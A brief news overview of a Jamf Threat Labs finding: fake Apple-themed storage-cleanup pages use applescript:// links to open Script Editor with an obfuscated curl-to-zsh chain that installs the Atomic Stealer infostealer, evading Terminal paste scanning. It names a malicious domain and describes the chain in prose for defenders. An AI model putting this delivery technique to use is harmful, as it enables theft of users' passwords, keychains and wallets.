Overview
- Jamf Threat Labs, which published findings Wednesday, said active fake Apple-themed sites use applescript:// links to open Script Editor with code preloaded.
- The lure poses as a storage cleanup guide and shows an Execute button that triggers a normal-looking browser prompt to open Script Editor.
- After the user runs it, the script starts an obfuscated curl to zsh chain that decodes a base64 and gzip payload, writes a file in /tmp, clears xattr, and executes it.
- The final payload is Atomic Stealer, which can take Keychain items, browser wallet data, autofill entries, passwords, cookies, stored credit cards, and system details.
- The change avoids Apple’s new Terminal paste scanning, so defenders are blocking domains like dryvecar[.]com and urging users to treat Script Editor prompts as high risk and to avoid running scripts launched from webpages.